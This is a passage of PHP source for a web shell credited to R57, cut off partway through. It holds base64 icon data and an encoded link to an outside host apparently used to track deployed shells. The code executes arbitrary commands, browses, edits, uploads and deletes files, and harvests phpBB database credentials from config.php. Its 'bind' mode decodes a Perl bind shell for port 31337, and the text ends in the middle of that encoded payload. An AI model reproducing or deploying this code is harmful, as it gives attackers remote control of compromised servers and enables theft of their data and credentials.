"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAANESURBVHjaYjxx5tZzXh4OHgYk8O3nb4YfP/8zfHhwjkH3aTHD97+WP8+sP7Pw7d173UxMDC+Q1QIEEAsfH6eAhoo0B7Lgr9//GH7+Z2L4+KafQcrgMQPTX2keaVa1onU9924wMjLMZmBEqAUIIJb///7/YUADzKxMDP+fvWQQZN/EwPQaKHDxBMOni0xfPrJwX//99y8D43+EWoAAYmHAAkAWML9ZxsDB8JiB4T0DGJ/nMOb+kJHX9vXzu3hGBsb7rGxsDKwsbAwAAYTVgL+fPjMwf1jEwPwbyPnOxPDsKSPDV4swRnYedttH9587cXJxzb1x5hrD7ZuXGQACCKsBDB/3MzD/ucjA8ION4f/LvwwvpK0YZF2CGb7dvs5w6fvnn2/fvGTYs2MNUOEfBoAAYsKm///DyQysvJwMDF84GN5/5GP4ouHHICQjxcDM8JeBhYWV4cqlK0BV/4CYjQEggDBc8PfFCQZmjltAzcCY/cTA8I5HjUHQIZSB8/9PBj4eXoYjBw8x3LtzHqiSlQ0UYQABhOoCYAj/ezaPgYkDKPwTaPMHHob3Mp4MglLSDCzABMDIzMjw5vVLTpBuIBYBYm6AAGKBRelPUNS8uMjAwv6QgfGPIJDDzvDqOzuDaFAsw68vHxh+//rJ8OnjJwYmRiZgmmGEuZwXIIDgXvgH8tLfH0CGNAMDBy/Dl+dPGd4IWzNw/GNm+Pn6DVAjI8M/oAtBQQQLKlAoAgQQE3Lc//nNCExELgx//7gyXLwmyPBb1YHhDzCd/f33n4GFlQWohhGkC6wRiD8A8VuAAIK7gJWZgeHhy28Ml/YdYZDm5GZgtM1i4FbSZPjz4xvYMmYWJgYubm4GJiamr0Bn/oZgJgaAAGJCdtOP738Ynt96zsBq7M8grGsODOMfDGzAaBMU5GMQExMHuoKZwcbe8begkCwDIyM4EhgAAoiFCQjBSReINY3NGVQMTBmYBYSANv9m+C3Ay8DKzgb0+38GNjZmBmZmFgYuLk6m8KhYhlu3bjLcv3OdASCAWO7eefhh1Yo1PCAnMjIDYwcUWH9+AZ3FDHTZX4b/IE8Dw4CJiZHhAzAWgGHx68vXLwwKCooMqqrqDAABBgD54A4xrMo1ZAAAAABJRU5ErkJggg==", "delete" => "R0lGODlhEAAQANUAAMczNfRxdPRzdPNydPNzddgqL+AsNN8sM8cpMOY2PuU2PsUgK+UwOfJVYPRja/NjavNja/Nka8UYJ8YZKMUZJ8YgLPJUYMUTJfE/UvA/UfJIWPFIWNRldN+cqMpdSc5uXspXRspYRslYRtWIfMlQQ9ymoMlHPslHP8hHP8c9OeBhW/WBfcc9OuNST/WAfvSAfuPExP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAADEALAAAAAAQABAAAAZ8wJhwSCwaj0eYZ1QceWBEWKgVYgpHohYIKiyRXCvSp/QhvcIl4ghFEKhMqkHgZCVyWBHIw/FIcZAACg0NFgkASDEIDBsaGgwISBwVGJSUC39FHBOUBRIFGBkUmEIdF6AXHB0cphkXHUMwFwaoQ6sHF1xCsaNCq7mIwMExQQA7", "folder"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QAAAAAAAD5Q7t/AAAACXBIWXMAAA3XAAAN1wFCKJt4AAAAB3RJTUUH1QsKEjkN+d1wUAAAAX9JREFUOMulkU2IUlEYhp9jKv5AposQWgRBtA6CmSCa5SzjYhG0qYggiP6Y3WxmtrMIol1QM84qRKRlSVC2bBcYRpuIIigFC7F7j0fP/WZx7QriBc2XDw6cw/e8L+9Rly6XtorF4jZTMsYE58Dc2tvdf0KE1J17t+X61RszH7X2eLb3lF6vd6VaqT2PBJSci7Q+taJMeNt4M331qFqpPQCIA6TTGY7k8pEA50IpcFMKpRS1F9X7QAAwxuB5Lq8/9ml2Msylww5nbjpSSOnPYYJmJ8PjjXW0sXMxUslD3H1YPxUH8DwXgJ+/NV/af+cCnDiaBSCmtSadnjP6DMVc1w0T/BfgXwdLARZNYK2PHgZlh7+QiPkIICIopRARRMAXwVphaH3MSBiMLEMr5LLJCcDzXI7nBnT7hh9dD0ThI4wHERAEkTEYGFmZAH512pw+e44PX/+MlwJ3EfARBAUiYaqVkwXqL1+R19/L6vy1nYabOLa2aHnZ4bf378qbqyyrA8KHtMqnsOL4AAAAAElFTkSuQmCC", "small_unk"=> "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". "p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". "/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". "/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". "/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". "wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". "9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". "66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". "24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". "aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". "uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". "yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". "yAsokBkQADs=", "url"=> "aHR0cDovL24wdHcuYWx0ZXJ2aXN0YS5vcmcvYy5waHA/dHlwZT1zaGVsbHMmYz0=", "ext_mp3"=> "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", "ext_exe"=> "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". "xhIAOw==", "ext_html"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAP3SURBVHjaYtxx5BYDIwMUMDLESIjyTeRiZ2H4//8/WOgvEP/69Zfh5+9/DI8ev3jx9NGDKAYmpovc/MIMc6e0MwAEEAszEyPDP6h+pn9/ORWkBYV4OVlhRjL8Bprz5etfhncfPjP8l5IQ4uVh33Lt2i1foAUXQPIAAcSirC3F8PoXI8N7JmaGrw9f//z67S8DCzMrAwvjPwZWVkYGpv+MDIxAJzIB5VlZGBgsjTRlWFiYN99//BpsCEAAsbCxsTCwMjEx/P3NZPmcSTB2/UNmBsb//xi+fv3DoCH8l8FFlZmBg4WVgZ2dleHHr98Ml27cY/jPwCzDxc23BejLQIAAAEEAvv8CAwH/APT1/l/l7P+/IRwHREEtBQAmJgIA+g4GAKHUBgCGufQA9fb1AAgFAwASEAwA9ff+AOjr8QAFBgob/Pz9YQKI6ePP/7qH7zBP5GJhYtfjZ2KQAnqfCehUoIUMnFzMDBuv8TAsOPSeAWgk0GvMDNxc7AxCvOwM4sI8QJf8/wsQQCzbb/9L/vGLgd9KkoHh03cGhku/GBhefmVg+AjEQHFgxDAzrDr4ncFK/jkDDxcfMDwYGbi4OBhYgF4HBs1/gABiOnf9p/mrT78ZXv9hYHj3m4Hh8hMGhquPGBgevmRgeP+NgeHP5+8Mty98ZLj++D0DK/N/Bm4OdmDA/mDg52QDxztAADG9fPyDb/eRDwzTjvxmAJrBYAx0yV+gzfeBBvz68pfh64PXDOxcrAx//4Jih4mBDRgVPDxAlwDZoNgBCCCmPz//Pn15+iXDiyufGF5+ANnAwMD66yfDzcNPGIS/vWb4+uITAycvE1icmQUYlaysDF8/vwMGKhM4nQAEENOz84t2i4mJMHiYcDNI8DMyCAJdZi4FjB9LVgZ9VW4GEWleBgWJHwxSQEOYgdH5H5jsRETFGf4D0wUorQIEENODQ5MWq2h9uSUty8EgJcDAIMfOwOCpy8FQkibOoKbOy+AaKMbgYfiRQVxEDOhkFgZmYJp58fwJMGj/AkOAkQEggFh+fHj54uLq1PhTurMXPXqkpsr5+QMDDzczA5cML8OzN58YBN+dY7DSEGLgFxJl+AUMh3///jDIysgDww/". "kgv8MAAHEDPLH19ePnpzcsmzLzduvFT4zKGucOP+M4ffnZwyKrI8ZbDVEGBSUNYDqgRr+/WdgAtL37txgEAZ6Y9XKlacAAogFlmn+fnt3X+bv6e0L6tr8P757B4yJvwzcvIIMbBycDH+". "Bnv0NzI3ADMHw5+8/Bg1dYwYmNmB+YWXlAAggRE4GxsnUeev09+zalvDsySOgwYzgDA2y9T/Df3juBDFBPBYWNsbbN86fBAgwAD3nU17W2F2kAAAAAElFTkSuQmCC", "ext_jpg"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAACjUlEQVQ4jW2STW8jRRCGn+rp+UhGdmKPN5YhwYFIDuxHDrn4Hu6RyE/YC8oPyB+BAzlyzoUjSAgJrbRI5IKEEmmFYKNI3ll2bLPxbpZxnJ5uDjNxshJ96Gqpup56u94W5xwHBwfB/v7+l0op5ZwTgP+JjmoVReH29va+Pj09LTTAysrK4pM/069+fDYA5vcAEEBEQAQl5fnz3ipJknwDlIAoilQYhjSaDQCUSFksglRFSlQZlRAvLrC1taWBKw0QBIFarsVsfBggVVsBBEFEiHwPB7TiiLdXhsai0Ol0NEC5ae2tJ8uEdcXo3ZT82jA1BeIcjcgnDjSeEpYDC7zlzfCCVqt1CwjDUP387Iwf/niJrz18z8PXHrXI53F/lSQYUw8sSoAaXDbvkaV/+3cBnhcv8EGyPB9eLfR41KnRqQc0wgb59B++H/3KLxenrC/cZz1a9eYA3/dVgdBY8HjYjnjQDqjH7xjkf/Fk+Irn+Ut+ev0b6dUIgMfRZwRBcAtQSqn+x00+/WjKi2nG8b9jppezylKfuu7yxb1u5YrwqPaAy1dvbgHOOWnVm7Ro8olz3Pkzt/+hKpbK4qfqqZoDynyZMMaQZRmTyYSiKOh2u2RZhjGGOI5ZW1vDOZkXqAqgbujX19cMBgPOzs4wxnBycsJ4PKbdbmOMwSEU1mKtZQ7wPE8rpd6TubS0xPb2Nv1+nzzPybKM8/NzCmNxtmA2m8ndIXo3T0jTlF6vR7PZpHKInZ0drIWNjR5QoLXH8fHx5e7ubqlAa61vOm9ubpIkyXtqnCtnA5YoihgOh78fHh6+nivI8/wiTdNvnXMWsM45KyLWOWedwxbWFcbMbBSGs8lkkh0dHX03Go2mAP8BZNgCDYdm9o4AAAAASUVORK5CYII=", "ext_php"=> "R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". "t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", "ext_pl"=> "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". "GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", "ext_swf"=> "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". "nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". "ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". "GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". "NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", "ext_tar"=> "R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". "Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". "HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". "UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". "uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". "GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". "HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". "u4tLAgEAOw==", "ext_txt"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAACXBIWXMAAAsTAAALEwEAmpwYAAAABGdBTUEAALGOfPtRkwAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAACm0lEQVR42mLs7+//z0ABAAhAcRzbAAjDABD8gpXYy6O4ZxKWQCxATUuB4+A4glD8ST/9iAjr3vDobIdzeaNEjn8pCVYcqzHq2JPcNTmXGVXlE0AsMJPMVZkZ/jMwM9hosDD8A7rpHyMTw5/P7xi+Pn/CwCwizcDExcPw99dvhr9AyT9//8JdABBAcAMEuJmgLCgNNOTP60kMDDycDJ8fyjCwKZkxcEqrMPz9/ZPh/3+4NgaAAGLB5i9QoPx+d4mB8VcvA+sHBgbmB44MP6WNGZj+/Gf4B8L//jGwcUDUAgQQE1YD/gGJL/MYWBm/Mfy7y8Lwm1uPgUNei+H/n19A2/8z/EXyAkAAsWCz/e/HWwxMv3cyMHxWYPjySZSByTyCgZHhH9hmkGaQITAAEECYBgAN//9hMQMrMxvDv7dCDD9l/Ri45XUZ/v36BgzAfwyMjIwMzMzMcPUAAQT3AshUkMv/frnDwMx6AxgIqgzfviowsOr6g0QhipmYgC74h2IhQADBXfD9+w+g6awMTJ/2MLCyCDD8+8jI8J1bg4FbQpnhHzDkfwLTAUjNjx+/GTg4WBn4+PjA+gACCOEFYLz/+/aMgeXnKwYGdiWGr58/MfxXcmP48vU7w/cvnxn+/PnD8AuYDkDh8Pv3L7g2gACCG8AE9Bcojv8ymTL8//ST4c3fT0CDRBj+ffgI9vefP38ZLl06C9cIYwMEEMIAoP++//rHcPvQJQZhRT0GBkVHBiZgfLKwMAOdzA5UwQ5WFx4eDqZBybiwsFAYIIAQBjAyMLBx8jIIKhsy8GmZA6MNmLCBgpyc7AysrKxA/3+D2w7VzAUKOoAAghvAwszEwCIqxaAKxNgAFxc3smYWWNQABBALTJBYgKwZBAACDAAKWftvHUTAkgAAAABJRU5ErkJggg==", ); if ($_GET[act] == "img") { header("Content-type: image/gif"); header("Cache-control: public"); header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); header("Cache-control: max-age=".(60*60*24*7)); header("Last-Modified: ".date("r",filemtime(__FILE__))); $image = $images[$_GET['img']]; echo base64_decode($image); die(); } // Function for table dump function getperms ($perms) { // <--- thx to php.net if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function datadump ($table) { // <--- thx to mrwebmaster for function # Creo la variabile $result $result .= "# Dump of $table \n"; $result .= "# Dump DATE : " . date("d-M-Y") ."\n\n"; # Conto i campi presenti nella tabella $query = mysql_query("select * from $table"); $num_fields = @mysql_num_fields($query); # Conto il numero di righe presenti nella tabella $numrow = mysql_num_rows($query); # Passo con un ciclo for tutte le righe della tabella for ($i =0; $i<$numrow; $i++) { $row = mysql_fetch_row($query); # Ricreo la tipica sintassi di un comune Dump $result .= "INSERT INTO ".$table." VALUES("; # Con un secondo ciclo for stampo i valori di tutti i campi # trovati in ogni riga for($j=0; $j<$num_fields; $j++) { $row[$j] = addslashes($row[$j]); $row[$j] = ereg_replace("\n","\\n",$row[$j]); if (isset($row[$j])) $result .= "\"$row[$j]\"" ; else $result .= "\"\""; if ($j<($num_fields-1)) $result .= ","; } # Chiudo l'istruzione INSERT $result .= ");\n"; } return $result . "\n\n\n"; } // using which THX TO R57 function whicha($pr) { $path = exa("which $pr"); if(!empty($path)) { return $path; } else { return $pr; } } // executing command THX TO R57 function exa($cfe) { $res = ''; if (!empty($cfe)) { if(function_exists('exec')) { @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } // function pari function pari($num) { return ($num%2 == 0) ? TRUE : FALSE; } // Getting Directory.. if ($_POST['dir'] == "") { if ($_COOKIE['dir'] == "") { $dir=realpath("."); } else { $d = str_replace("\\",DIRECTORY_SEPARATOR, $_COOKIE['dir']); $d = str_replace("\\\\","\\", $_COOKIE['dir']); $dir = $d; } } else { $dir = str_replace("\\",DIRECTORY_SEPARATOR,$_POST['dir']); $d = str_replace("\\\\","\\", $_POST['dir']); setcookie("dir",$dir); } if (substr($dir,-1) != DIRECTORY_SEPARATOR) {$dir .= DIRECTORY_SEPARATOR;} // Getting something... $safemode_off_msg = "Safe Mode: OFF
"; $safemode_on_msg = "Safe Mode: ON
"; $gpc_off_msg = "Magic Quotes: OFF
"; $gpc_on_msg = "Magic Quotes: ON
"; $auf_on_msg = "Allow URL Fopen: ON
"; $auf_off_msg = "Allow URL Fopen: OFF
"; $reglobals_on_msg = "Register Globals: ON
"; $reglobals_off_msg = stripslashes("Register Globals: OFF
"); $uname = php_uname(); (ini_get("safe_mode") == 0) ? $safemode = $safemode_off_msg : $safemode = $safemode_on_msg; (ini_get("magic_quotes_gpc") == 0) ? $gpc = $gpc_off_msg : $gpc = $gpc_on_msg; (ini_get("allow_url_fopen") == 1) ? $auf = $auf_on_msg : $auf = $auf_off_msg; (ini_get("register_globals") == 1) ? $reglobals = $reglobals_on_msg : $reglobals = $reglobals_off_msg; $freespace = disk_free_space($dir); $totalspace = disk_total_space($dir); $percentfree = round(($freespace*100)/$totalspace); $percentbusy = 100-$percentfree; $freespace = intval((($freespace/1024)/1024)/1024); $totalspace = intval((($totalspace/1024)/1024)/1024); $freespace .= " GB"; $totalspace .= " GB"; $current_user = "Who are you? ".get_current_user()."
"; $uid = "Uid: ".getmyuid()." Gid: ".getmygid()."
"; if ($_POST['mode'] == "") $_POST['mode'] = "ls"; if ($_POST['mode'] == "ls") { //Directory listing $output .= "

Directory listing [ {$dir} ]
"; $output .= ''; $opendir = opendir($dir)or print("Can't open directory"); $i = 1; while ($file=readdir($opendir)){ $color = "#333333"; $icons = array( "txt" => "ext_txt", "ini" => "ext_txt", "sql" => "ext_txt", "php" => "ext_php", "pl" => "ext_pl", "html" => "ext_html", "htm" => "ext_html", "mp3" => "ext_mp3", "swf" => "ext_swf", "rar" => "ext_tar", "zip" => "ext_tar", "tar" => "ext_tar", "gz" => "ext_tar", "bz" => "ext_tar", "exe" => "ext_exe", "jpg" => "ext_jpg", "png" => "ext_jpg", "gif" => "ext_jpg"); if ($dir == realpath(".")) { if (is_file($file)){ $ext = array_pop(explode(".",$file)); if (array_key_exists($ext, $icons)) $icon = $icons[$ext]; else $icon = "small_unk"; if (function_exists("posix_getpwuid")) { $uid = posix_getpwuid(fileowner($file)); $gr00p = posix_getgrgid(filegroup($file)); $owner = $uid[name]."/".$gr00p[name]; } else { $owner = fileowner($file)."/".filegroup($file); } $perms = fileperms($file); $info = getperms($perms); if (!is_readable($file)) $info = "{$info}"; elseif (!is_writable($file)) $info = "{$info}"; else $info = "{$info}"; $output.= ' '; } else { if (function_exists("posix_getpwuid")) { $uid = posix_getpwuid(fileowner($file)); $gr00p = posix_getgrgid(filegroup($file)); $owner = $uid[name]."/".$gr00p[name]; } else { $owner = fileowner($file)."/".filegroup($file); } $perms = fileperms($file); $info = getperms($perms); if (!is_readable($file)) $info = "{$info}"; elseif (!is_writable($file)) $info = "{$info}"; else $info = "{$info}"; $output.= ' '; $output .= ''; } } else { chdir($dir); if (is_file($file)){ $ext = array_pop(explode(".",$file)); if (array_key_exists($ext, $icons)) $icon = $icons[$ext]; else $icon = "small_unk"; if (function_exists("posix_getpwuid")) { $uid = posix_getpwuid(fileowner($file)); $gr00p = posix_getgrgid(filegroup($file)); $owner = $uid[name]."/".$gr00p[name]; } else { $owner = fileowner($file)."/".filegroup($file); } $perms = fileperms($file); $info = getperms($perms); if (!is_readable($file)) $info = "{$info}"; elseif (!is_writable($file)) $info = "{$info}"; else $info = "{$info}"; $output.= ' '; } else { if (function_exists("posix_getpwuid")) { $uid = posix_getpwuid(fileowner($file)); $gr00p = posix_getgrgid(filegroup($file)); $owner = $uid[name]."/".$gr00p[name]; } else { $owner = fileowner($file)."/".filegroup($file); } $perms = fileperms($file); $info = getperms($perms); if (!is_readable($file)) $info = "{$info}"; elseif (!is_writable($file)) $info = "{$info}"; else $info = "{$info}"; $output.= ' '; } } $i++; } $output .= ""; } //Editing file... if ($_POST['mode']=="edit") { ($dir==realpath(".")) ? $file=$_POST['modfile'] : $file=$dir.$_POST['modfile']; $content = file_get_contents($file); if ($_POST[modfile]=="config.php") { include($file); $link = "javascript:var form=document.sqlpanel; form.user.value='".addslashes($dbuser). "';form.pass.value='".addslashes($dbpasswd)."';form.host.value='".addslashes($dbhost). "';form.dbname.value='".addslashes($dbname)."';document.sqlpanel.submit();"; $output .= "phpBB config file detected! click here to connect
"; } $output .= "
"; } if ($_POST['mode']=="doedit") { ($dir==realpath(".")) ? $file=$_POST['modfile'] : $file=$dir.$_POST['modfile']; $output .= $file."
"; $fh = fopen($file, "w+")or die("Error: cannot open file"); $_POST['newtext'] = (ini_get("magic_quotes_gpc")) ? stripslashes($_POST['newtext']) : $_POST['newtext']; fwrite($fh, $_POST['newtext'])or die("Error: cannot write to file"); fclose($fh); $output .= "Done."; } //Making file.. if ($_POST['mode'] == "mkfile") { ($dir==realpath(".")) ? $file=$_POST['mkfile'] : $file=$dir.$_POST['mkfile']; $output .= "
"; } if ($_POST['mode'] == "domkfile") { ($dir==realpath(".")) ? $file=$_POST['mkfile'] : $file=$dir.$_POST['mkfile']; $fh = fopen($file, "w+")or die("Error: cannot create file"); $_POST['text'] = (ini_get("magic_quotes_gpc")) ? stripslashes($_POST['text']) : $_POST['text']; fwrite($fh, $_POST['text'])or die("Error: cannot write to file"); fclose($fh); $output .= "Made."; } //Deleting file.. if ($_POST['mode'] == "delfile") { ($dir==realpath(".")) ? $file=$_POST['delfile'] : $file=$dir.$_POST['delfile']; unlink($file)or die("Error: cannot delete file"); $output .= "File deleted."; } // cmd... if ($_POST['mode'] == "cmd") { /*switch ($_POST['func']) { case "system": system(stripslashes($_POST['cmd'])); die(); break; case "popen": $handle = popen($_POST['cmd'].' 2>&1', 'r'); echo "'$handle'; " . gettype($handle) . "\n"; $read = fread($handle, 2096); echo $read; pclose($handle); die(); break; case "shell_exec": shell_exec(stripslashes($_POST['cmd'])); die(); break; case "exec": exec(stripslashes($_POST['cmd'])); die(); break; case "passthru": passthru(stripslashes($_POST['cmd'])); die(); break;}*/ chdir($dir); $res = exa(stripslashes($_POST[cmd])); $output = $res; } // upload if ($_POST['mode'] == "upload2") { $percorso = $_FILES['myfile']['tmp_name']; $nome = $_FILES['myfile']['name']; if (!move_uploaded_file($percorso, $dir.$nome)) { $output = "Cannot upload"; } else { $output .= "

$nome Has Been Saved!";} } // rename if ($_POST['mode'] == "renfile") { if(!rename($dir.$_POST['oldname'], $dir.$_POST['newname'])) $output = "Cannot rename file"; else $output = "File renamed."; } // Bind port if ($_POST['mode'] == "bind") { chdir($dir); $os = substr(strtoupper(PHP_OS),0,3); $port = 31337; $txt = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0OyANCnVzZSBGaWxlSGFuZGxlOyAjIHBlciBsJ2F1dG9mbHVzaA0KJG1heF9jb25uPTEwOw0KJHBvcnRhX2xvY2FsZT0kQVJHVlswXTsNCiRzeXMgPSAkQVJHVlsxXTsNCmlmICgkc3lzIGVxICJMSU4iKSB7ICRjbWQgPSAiL2Jpbi9iYXNoIjsgfQ0KaWYgKCRzeXMgZXEgIldJTiIpIHsgJGNtZCA9ICJDOlxcd2luZG93c1xcc3lzdGVtMzJcXGNtZC5leGUiOyB9DQokcGFkZHJfbG9jYWxlPXBhY2tfc29ja2FkZHJfaW4oJHBvcnRhX2xvY2FsZSxJTkFERFJfQU5ZKTsNCnNvY2tldChTRVJWLEFGX0lORVQsU09DS19TVFJFQU0sJ3RjcCcpIHx8IGRpZSgiRXJyb3JlOiAkISIpOyAgI3NlcnZlci1zb2NrZXQNCnNldHNvY2tvcHQoU0VSVixTT0xfU09DS0VULFNPX1JFVVNFQUREUiwxKSB8fCBkaWUoIkVycm9yZTogJCEiKTsNCmJpbmQoU0VSViwkcGFkZHJfbG9jYWxlKSB8fCBkaWUoIkVycm9yZTogJCEiKTsNCmxpc3RlbihTRVJWLCRtYXhfY29ubikgfHwgZGllKCJFcnJvcmU6ICQhIik7DQpteSAkcGFkZHJfc2luZz1hY2NlcHQoU0lORywgU0VSVik7ICNhY2NldHRvIGxhIGNvbm5lc3Npb25lIGRhbCBjbGllbnQNCm15KCRzaW5nX3BvcnRhLCRzaW5nX2FkZHIsJGdldCk9dW5wYWNrX3NvY2thZGRyX2luKCRwYWRkcl9zaW5nKTsNClNJTkctPmF1dG9mbHVzaCgpOw0Kb3BlbihTVERJTiwgIj4mU0lORyIpOw0Kb3BlbihTVERPVVQsIj4mU0lORyIpOw